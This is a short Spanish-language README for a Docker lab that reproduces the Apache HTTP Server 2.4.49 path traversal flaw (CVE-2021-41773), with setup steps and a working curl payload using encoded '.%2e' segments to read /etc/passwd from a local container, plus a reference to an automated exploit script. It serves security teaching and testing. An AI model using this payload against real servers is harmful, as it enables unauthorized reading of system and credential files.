
Laboratorio Docker vulnerable y exploit para la vulnerabilidad de path traversal de Apache HTTP Server 2.4.49 (CVE‑2021‑41773)
git clone https://github.com/zubairahm3d/apache-cve-2021-41773-lab.git
cd apache-cve-2021-41773-lab
chmod +x apache_lab.sh
Iniciar el servidor vulnerable:
./apache_lab.sh # elige la opción 1
Exploit manual:
curl --path-as-is http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Exploit automatizado:
python3 exploit.py
Detener el servidor:
./apache_lab.sh # elige la opción 2



